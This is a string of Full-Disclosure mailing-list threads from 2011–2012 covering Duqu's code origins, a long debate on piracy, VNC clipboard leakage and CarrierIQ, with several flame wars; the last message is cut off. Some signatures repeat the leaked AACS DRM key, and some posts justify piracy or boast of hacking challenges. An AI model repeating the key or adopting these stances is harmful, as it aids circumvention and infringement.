At this point, I think someone (possibly the guys at securelist) ought to define 'new programming language'. By new I take it the writers would have created their own language. While far from impossible, it's quite improbable. It's possible someone out there decided something can't be achieved in any language, and thus have created their own. On the other hand, by 'new' it seems many people seem to relate to 'unconventional languages' as well. There are many languages out there, some are far from anything related to C++ (as much as the C++ fanboys want us not to believe). So the mere speculation that it looks like 1% C++ here and there simply hinders actual serious investigation. I can think of at least 3 different languages not mentioned on securelist nor on FD. I didn't suggest any of them simply because I don't know what they generate (I'm not proficient in either of them) but I do know they do not rely on any C++ compiler. 2012/3/11 Sanguinarious Rose sanguiner...@occultusterra.com Do you have any suggestions as to what C++ compiler could generate such code in such a case and how one could generate similar code that matches the decompiled parts? Granted their theory of a new language is moonbatty but I think they have the knowledge to recognize a common compiler. As for ctor and dtor, I am pretty sure they were marked by the researcher doing the decompiling or the decompiler and no such symbol names are in the executable. I would conclude as such for the other symbols named due to how they were named. I do agree on the new language being possibly the dumbest insane moonbat speculation of the year however I have heard a few other things that win over that hands down ;) On Sat, Mar 10, 2012 at 1:16 PM, William Pitcock neno...@systeminplace.net wrote: On 3/10/2012 9:00 AM, 夜神 岩男 wrote: On 03/10/2012 03:51 AM, f...@deserted.net wrote: http://www.securelist.com/en/blog/667/The_Mystery_of_the_Duqu_Framework Haven't seen this (or much discussion around this) here yet, so I figured I'd share. From the description, it looks like someone pushed some code from a Lisp[1] variant (like Common Lisp, which is preprocesed into ANSI C by GCL, for example, before compilation) into a C++ DLL. Normal in the deper end of Linux dev or Hurd communities, but definitely not standard practice in any established industry that makes use of Windows. I could be wrong, I didn't take the time to walk myself through the decompile with any thoroughness and compare it to code I generate. Anyway, I have no idea the differences between how VC++ and g++ do things -- so my analysis would probably be trash. But from the way the Mr. Soumenkov describes things it seems this, or something similar, could be the case and why the code doesn't conform to what's expected in a C++ binary. LISP would refer to specific constructor/destructor vtable entries as cons and there would be no destructor at all. The structs use vtables which refer to ctor and dtor, which indicates that the vtables were most likely generated using a C++ compiler (since that is standard nomenclature for C++ compiler symbols). It pretty much has to be Microsoft COM. The struct layouts pretty much *reek* of Microsoft COM when used with a detached vtable (such as if the implementation is loaded from a COM object file). The fact that specific vtable entries aren't mangled is also strong evidence of it being Microsoft COM (since there is no need to mangle vtable entries of a COM object due to type information already being known in the COM object). If it looks like COM, smells like COM, and acts like COM, then it's probably COM. It certainly isn't some new programming language like Kaspersky says. That's just the dumbest thing I've heard this year. William ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Anon war?- arrests
Go back to your elite hacker club anonops then. Come back with something real these kids have done. .other than trolling. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Anon war?- arrests
And we'd like to add that we are not crooks. - Anonymous. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] hackers.it disappeared from google search results
Must have been Anonymous fooling around with Google. On Thu, Feb 2, 2012 at 11:42 AM, Milan Berger m.ber...@project-mindstorm.net wrote: Since few days my domain is out for first tests ..but today it is totally disappeared from Google search results. Do you know how this can happen? It has no malwares, exploits or anything illegal and there is neither the intent as you can read in the few pages. the domain is hackers.it Any help in understanding would be appreciated. google site:hackers.it gives me: | hackers.it | Information Security Magazine | www.hackers.it/ - Diese Seite übersetzen 2011 www.hackers.it - All rights reserved. So not really purged :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] when did piracy/theft become expression of freedom
No, it follows the fact that vengeance (the fuck you Byron mentioned) isn't fruitful to remedy the situation. On Mon, Jan 30, 2012 at 8:54 AM, Mike Hale eyeronic.des...@gmail.comwrote: What you said doesn't follow. Making a digital copy isn't burning down a business. The analogy linking 'piracy' with theft is ludicrous. On Sun, Jan 29, 2012 at 11:50 PM, Christian Sciberras uuf6...@gmail.com wrote: Byron, you don't protest to the government by burning down 100-year-old business, if you know what I mean... On Mon, Jan 30, 2012 at 12:12 AM, Byron L. Sonne byron.so...@gmail.com wrote: The thing that makes me laugh about all of this, and one of the key things I learned from reading Gibbon's Decline Fall is this: The number and frequency of laws passed regarding things directly relates to how widespread these things are, and how they much the laws are ignored and ineffective. Laws can't prevent a damn thing, they can only specify remedies. As it is said, it's only illegal if you get caught. The cat is out of the bag and will never be put back in. There's no way to stop people from 'illegally' copying copyrighted material. If they somehow managed to require and implement tech so that perfect digital copies can't be made (unlikely) then people will simply use a camera to record the video as it plays on the screen. Hey, wait a minute, that sounds just like that screener I downloaded someone taped in Russia! ;) If they manage to require and implement tech so that you can't trade it over the internet (unlikely) then people will simply trade it on private networks or, like we used to do in the old days, via sneakernet. The problem is that in an attempt to control the dissemination of copyrighted material (and people are right, artists do have a right to reap the benefits of their effort) the powers-that-be are stepping over the line and into territory that impacts our ability to communicate in the fashion we choose. It might be fine to try and prevent piracy but in the process of doing so you are trashing the other desires of people that have nothing to do with piracy. I'm sure if the copyright lobby had their way, they'd require us to wear special glasses in order to see our laptop screens, on the assumption that anything not explicitly licensed was assumed to be unlicensed, and thus pirated, which we would be blocked from our field of view... and as a result, some girl/guy who wants to write a simple freeware text editor now has to jump through regulatory hoops and spend money to obtain a special registration that allows their text editor to display to the screen. This is a cheesy example, but I think it makes the point. In the guise of 'protecting artists and businesses' what is happening is that the powers-that-be are requesting (and too often getting) powers that allow them to trample on the general idea of freedom of communications and other things people cherish. As a result, people are inclined to engage in the very behaviours that elicited the laws and crackdowns, quite simply, as a way to raise their middle finger and say Fuck You. This is when piracy and theft becomes freedom of expression - when it's done in protest. -- http://www.freebyron.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] when did piracy/theft become expression of freedom
Uhm, that was a ridiculous situation anyway (@illegal primes). So lets leave it at 'not necessarily'. On Mon, Jan 30, 2012 at 9:08 AM, Mike Hale eyeronic.des...@gmail.comwrote: Not necessarily. Look at the effects of people posting DeCSS and the HDDVD keys a while back. The industry ended up giving in precisely because people said, en masse, fuck off. On Mon, Jan 30, 2012 at 12:05 AM, Christian Sciberras uuf6...@gmail.com wrote: No, it follows the fact that vengeance (the fuck you Byron mentioned) isn't fruitful to remedy the situation. On Mon, Jan 30, 2012 at 8:54 AM, Mike Hale eyeronic.des...@gmail.com wrote: What you said doesn't follow. Making a digital copy isn't burning down a business. The analogy linking 'piracy' with theft is ludicrous. On Sun, Jan 29, 2012 at 11:50 PM, Christian Sciberras uuf6...@gmail.com wrote: Byron, you don't protest to the government by burning down 100-year-old business, if you know what I mean... On Mon, Jan 30, 2012 at 12:12 AM, Byron L. Sonne byron.so...@gmail.com wrote: The thing that makes me laugh about all of this, and one of the key things I learned from reading Gibbon's Decline Fall is this: The number and frequency of laws passed regarding things directly relates to how widespread these things are, and how they much the laws are ignored and ineffective. Laws can't prevent a damn thing, they can only specify remedies. As it is said, it's only illegal if you get caught. The cat is out of the bag and will never be put back in. There's no way to stop people from 'illegally' copying copyrighted material. If they somehow managed to require and implement tech so that perfect digital copies can't be made (unlikely) then people will simply use a camera to record the video as it plays on the screen. Hey, wait a minute, that sounds just like that screener I downloaded someone taped in Russia! ;) If they manage to require and implement tech so that you can't trade it over the internet (unlikely) then people will simply trade it on private networks or, like we used to do in the old days, via sneakernet. The problem is that in an attempt to control the dissemination of copyrighted material (and people are right, artists do have a right to reap the benefits of their effort) the powers-that-be are stepping over the line and into territory that impacts our ability to communicate in the fashion we choose. It might be fine to try and prevent piracy but in the process of doing so you are trashing the other desires of people that have nothing to do with piracy. I'm sure if the copyright lobby had their way, they'd require us to wear special glasses in order to see our laptop screens, on the assumption that anything not explicitly licensed was assumed to be unlicensed, and thus pirated, which we would be blocked from our field of view... and as a result, some girl/guy who wants to write a simple freeware text editor now has to jump through regulatory hoops and spend money to obtain a special registration that allows their text editor to display to the screen. This is a cheesy example, but I think it makes the point. In the guise of 'protecting artists and businesses' what is happening is that the powers-that-be are requesting (and too often getting) powers that allow them to trample on the general idea of freedom of communications and other things people cherish. As a result, people are inclined to engage in the very behaviours that elicited the laws and crackdowns, quite simply, as a way to raise their middle finger and say Fuck You. This is when piracy and theft becomes freedom of expression - when it's done in protest. -- http://www.freebyron.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 -- 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] when did piracy/theft become expression of freedom
Byron, you don't protest to the government by burning down 100-year-old business, if you know what I mean... On Mon, Jan 30, 2012 at 12:12 AM, Byron L. Sonne byron.so...@gmail.comwrote: The thing that makes me laugh about all of this, and one of the key things I learned from reading Gibbon's Decline Fall is this: The number and frequency of laws passed regarding things directly relates to how widespread these things are, and how they much the laws are ignored and ineffective. Laws can't prevent a damn thing, they can only specify remedies. As it is said, it's only illegal if you get caught. The cat is out of the bag and will never be put back in. There's no way to stop people from 'illegally' copying copyrighted material. If they somehow managed to require and implement tech so that perfect digital copies can't be made (unlikely) then people will simply use a camera to record the video as it plays on the screen. Hey, wait a minute, that sounds just like that screener I downloaded someone taped in Russia! ;) If they manage to require and implement tech so that you can't trade it over the internet (unlikely) then people will simply trade it on private networks or, like we used to do in the old days, via sneakernet. The problem is that in an attempt to control the dissemination of copyrighted material (and people are right, artists do have a right to reap the benefits of their effort) the powers-that-be are stepping over the line and into territory that impacts our ability to communicate in the fashion we choose. It might be fine to try and prevent piracy but in the process of doing so you are trashing the other desires of people that have nothing to do with piracy. I'm sure if the copyright lobby had their way, they'd require us to wear special glasses in order to see our laptop screens, on the assumption that anything not explicitly licensed was assumed to be unlicensed, and thus pirated, which we would be blocked from our field of view... and as a result, some girl/guy who wants to write a simple freeware text editor now has to jump through regulatory hoops and spend money to obtain a special registration that allows their text editor to display to the screen. This is a cheesy example, but I think it makes the point. In the guise of 'protecting artists and businesses' what is happening is that the powers-that-be are requesting (and too often getting) powers that allow them to trample on the general idea of freedom of communications and other things people cherish. As a result, people are inclined to engage in the very behaviours that elicited the laws and crackdowns, quite simply, as a way to raise their middle finger and say Fuck You. This is when piracy and theft becomes freedom of expression - when it's done in protest. -- http://www.freebyron.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] when did piracy/theft become expression of freedom
Sadly you can't download routers and internet connections...especially without an internet connection. But I suppose you could be the regular joe and steal from your neighbours' bandwidth (it's a human right, remember? your neighbour doesn't have a right to keep the internets to himself!!!). /rant On Sat, Jan 28, 2012 at 10:33 PM, Laurelai laure...@oneechan.org wrote: On 1/28/2012 3:13 PM, Julius Kivimäki wrote: Of course I wouldn't, downloading a car would be like stealing a car. Piracy is horrible and all the boats used by the pirate scum should be taken away. 2012/1/28 Laurelai laure...@oneechan.org On this topic i saw this https://thepiratebay.org/torrent/6960965/1970_Chevelle_Hot-Rod_3d_model , real question is would you download a car if you could? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ If you took away their boats they would just download more...duh. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] when did piracy/theft become expression of freedom
That has always been viewed from the consumer perspective. If you look at it from the producers' perspective, you'll see their right to withhold their creative content until you pay something back. While the terminology is not correct, it doesn't mean you can abuse it and expect people to waste time for you. Another thing to note, if artists, software companies etc were so nice to actually want to give all this stuff for free, I'm pretty sure no one is forcing them to sell their content. So don't talk about the they're not loosing anything bullshit to me. Laurelai - Yes, I'm sure McDonalds have acknowledged your human right to a free internet connection. Next thing they'll be feeding you for free as well On Sat, Jan 28, 2012 at 11:26 PM, valdis.kletni...@vt.edu wrote: On Fri, 27 Jan 2012 19:02:09 PST, Zach C. said: If you buy an album used, the seller generally loses possession of it, you gain possession of it at a reduced cost, and the original purchase still gave the original seller and producer value. Note that if I shoplift a CD that sucks and isn't worth the $14.99 sticker price, I have deprived the producer of the ability to sell it to somebody else. That's the crucial point that underlies our social concept of theft - if I take it from you, you don't have it anymore. If I copy an album that isn't worth the sticker price, and which I would not have purchased at that price, two things of note happen: 1) As much as the labels wish it were so, they can't count that as lost revenue because it wouldn't have acccrued to them anyhow, any more than a car dealership can legitimately call it lost revenue if I walk onto their lot, tell the salescritter they're crazy if they think I'll pay $28K for a given car, and walk off the lot. (Now, if they want to count the Damn, we lost the $4.99 that guy *would* have paid if we charged that instead of $14.99, they're welcome to that. :) 2) More importantly, they still have the original bits and are free to look for other suckers who *will* pay $14.99. For the record, all my media is legitimately acquired, though a large portion *was* obtained used and if the producers don't like that, they're welcome to go re-read first sale doctrine ;) Just trying to make people actually engage their neurons - this stuff is *not* easy to sort out, because intellectual property and digital information do *not* behave the same as cars and cows in the physical world, and unintended consequences of policy decisions are all *over* the place. (DMCA anti-circumvention clause prohibiting me from fair-use accessing my own media, I'm looking at you. :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] when did piracy/theft become expression of freedom
Copyrights exist for consumers, at least according to the US constitution: snip And? I'm talking about the simple fact that the producer has the right to earn money from his creation. Copyright is just a tool. Copyrights do not exist for the benefit of producers; that is only a means to an end. The point of the copyright system is to benefit the general public. Exactly. So, in your own words, producers are at a loss. ...which is not the same as their right to prevent you from making copies of their work. Oh come on. Who are you trying to feed that to? You know damn well current court cases target 'copyright infringement' for non-personal usesuch as copying such material and selling it for profit. Why don't you just admit many people out there are afraid of loosing their little racket? Then tell me what they lost. Can you prove that someone who downloaded a song would have spent money on the song if it had not been available for download? The argument that losses are incurred for every download has always been baseless and always will be. Can you prove that a company/group can live on by handing out free copies of their song on the internet? How many companies out there do that? Industries need to adapt to the times, or else they die. What makes recording, movie production, etc. so special? Lets turn this to a different parallel issue, open source. Last I checked, income for opensource projects tend to come from one of the following: - advertisements - paid support - training How many such activities play well with records companies? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] when did piracy/theft become expression of freedom
Actually, *most* bands that make money do so off the concert tours - tickets and tshirts is where the actual money is at, not the album sales. So why bother with album sales in the first place? This is the same with free/commercial software. At the end of the day the creator decides the sales strategy. The only thing I can see in this is that the recording industry really needs to grow up to the times, but piracy is not a solution nor the means to one, just like DDoSing facebook is not the means to the removal of a certain bill/law (arguably, to the contrary). The recording companies have every right to retaliate just as the FBI has every right to arrest suspects involved in these childish acts. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
That's not necessarily true. On windows you can add custom clipboard formats that would contain a 'link' to the original source, causing the data to be actually passed when pasting. An example of this is when one copy+pastes a file. See the Windows Clipboard API for more info. Chris. On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote: I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them. On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote: On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So what ever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a cliboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report make complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
No, I only read the manual. Now go troll somwhere else. :) On Wed, Jan 25, 2012 at 11:35 AM, GloW - XD doo...@gmail.com wrote: Windows is even more secure, have you actually, read any of the code / On 25 January 2012 21:30, Christian Sciberras uuf6...@gmail.com wrote: That's not necessarily true. On windows you can add custom clipboard formats that would contain a 'link' to the original source, causing the data to be actually passed when pasting. An example of this is when one copy+pastes a file. See the Windows Clipboard API for more info. Chris. On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote: I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them. On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote: On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So what ever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a cliboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report make complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
For the record... who are the other 'many on this list' that know you don't troll other than your alter egos? 'course you don't troll can you quote me where I ever said VNC is secure? With that, I'll let you troll in peace. I have no interest talking to you anyway... :) On Wed, Jan 25, 2012 at 12:04 PM, GloW - XD doo...@gmail.com wrote: and stupidly, you forgot to addin the second PRIVT post i sent you, saying i meant *insecure :) now, go try tell me windows vnc is secure again...and, then setup a vnc on your box, and, under win32, try your best, when your ready, yell out, so i can make a compete fucking fool of ya. ok ? if this is how you want to play, i am challenging you, if i can own a shitty windows setup you 'secure' as best you8 can, here on fd, is this trolling is it ? its a challenge... maybe, if you read the lame rfb and, pixelisation via IP KVM, unfortunately for windows, it aint any different, a pixel is placed at X or Y, and, you can place data calls to it, from server wich, could be, my bot :) want more proof,...keep going with my challenge then. On 25 January 2012 21:38, Christian Sciberras uuf6...@gmail.com wrote: No, I only read the manual. Now go troll somwhere else. :) On Wed, Jan 25, 2012 at 11:35 AM, GloW - XD doo...@gmail.com wrote: Windows is even more secure, have you actually, read any of the code / On 25 January 2012 21:30, Christian Sciberras uuf6...@gmail.com wrote: That's not necessarily true. On windows you can add custom clipboard formats that would contain a 'link' to the original source, causing the data to be actually passed when pasting. An example of this is when one copy+pastes a file. See the Windows Clipboard API for more info. Chris. On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote: I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them. On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote: On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So what ever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a cliboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report make complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We
Re: [Full-disclosure] OT: Firefox question / poll
Both? On Tue, Dec 20, 2011 at 6:40 PM, Charles Morris cmor...@cs.odu.edu wrote: I'm curious what everyone's opinion is on the following question... esp. to any FF dev people on list: Do you think that the Firefox warning: unresponsive script is meant as a security feature or a usability feature? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] silly PoCs continue: X-Frame-Options give you less than expected
Because it's bugtraq / full-disclosure, where people generally talk about vulnerabilities... Sure thing. Complaining about patches that don't do anythinghttp://lcamtuf.blogspot.com/2011/12/x-frame-options-or-solving-wrong.htmlis a plus to your reputation, I guess, right? Finding tangible solutions to your problems means that eventually you'll loose the job. I'm not sure I follow your drift about Firefox, I don't believe it's mentioned anywhere. Indeed, you didn't mention Firefox. Someone else did. Why? It's harder to predict how much it would take for a page to load, as well as your caching concept will fail when the target in question can only be invoked by the user. Also, there's the situation where a simple click won't get you anywhere, for instance, in cases where a user has to enter his credentials as well as to confirm the action. Chris. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] OMIGOD CIQ HACKING THE WORLD.
Or not... http://vulnfactory.org/blog/2011/12/05/carrieriq-the-real-story/ On the other hand, where that l33t hacker Drew (aka xD 0x41)? Thought he'd enlighten us with more of his awesome hacking powers on this issue. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OMIGOD CIQ HACKING THE WORLD.
Uhm, pretty much any software entering your system has some potential to (being) wreck(ing) havoc, be whether it is an innocent gif file or a potentially backdoored exe. Still, that doesn't give me the right to shout at any software vendor baseless assumptions that simply damages its reputation. Think about it, if this software is in fact what they say it does (and does it pretty well) who's winning? The EFF guys? The genius that came up with the media scam? How many really good alternatives to it are there? Can we really blame the company for keeping its concepts secret (consider the amount of alternative software crap out there). But that's just my insignificant opinion, nothing to look at, keep on going. Meanwhile, as I promised someone, I'll do an occasional troll for the lulz*. *Hey, at least I don't crack servers en mas under soviet direction to get on with cocaine addiction :). With that said, I won't say another thing on this thread. If anyone feels compelled to keep any of this going, you know my personal email address. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NEVER AGAIN
James, could you please stop publishing emails intended for private use? It's getting plain ridiculous the amount of crap from this list I (and the rest) have to deal with every day. On Tue, Nov 22, 2011 at 3:06 PM, James Rankin kz2...@googlemail.com wrote: Whatever On 22 November 2011 14:05, andrew.wallace andrew.wall...@rocketmail.comwrote: The email is nothing to do with me or my consultancy. You need better analysis skills and a good lawyer. --- Andrew Wallace -- *From:* James Rankin kz2...@googlemail.com *To:* andrew.wallace andrew.wall...@rocketmail.com *Cc:* Darren Martyn d.martyn.fulldisclos...@gmail.com; Antony widmal antony.wid...@gmail.com; xD 0x41 sec...@gmail.com; Martin Allert all...@arago.de; full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.uk; phocean 0...@phocean.net; Nikolay Kichukov hijac...@oldum.net; valdis.kletni...@vt.edu valdis.kletni...@vt.edu *Sent:* Tuesday, November 22, 2011 2:01 PM *Subject:* Re: [Full-disclosure] NEVER AGAIN Strange. Your other personality said much the same thing. On 22 November 2011 13:57, andrew.wallace andrew.wall...@rocketmail.comwrote: You're making the worst mistake possible for yourself. --- Andrew Wallace -- *From:* James Rankin kz2...@googlemail.com *To:* andrew.wallace andrew.wall...@rocketmail.com *Cc:* Darren Martyn d.martyn.fulldisclos...@gmail.com; Antony widmal antony.wid...@gmail.com; Martin Allert all...@arago.de; full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.uk; phocean 0...@phocean.net; Nikolay Kichukov hijac...@oldum.net; valdis.kletni...@vt.edu valdis.kletni...@vt.edu *Sent:* Tuesday, November 22, 2011 1:51 PM *Subject:* Re: [Full-disclosure] NEVER AGAIN Consultancy. Hehe. You seriously need treatment for schizophrenia. Why don't you go and argue with your alter ego? Please tell your solicitor he is welcome to talk to mine any day. Regards, JR On 22 November 2011 13:48, andrew.wallace andrew.wall...@rocketmail.comwrote: I think you are mistaken, this email is not sent by my consultancy. I ask you to retract your statement or face legal action. --- Andrew Wallace Independent consultant https://plus.google.com/115085501867247270932/about -- On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into the machine wrong figures, will the right answers come out?' I 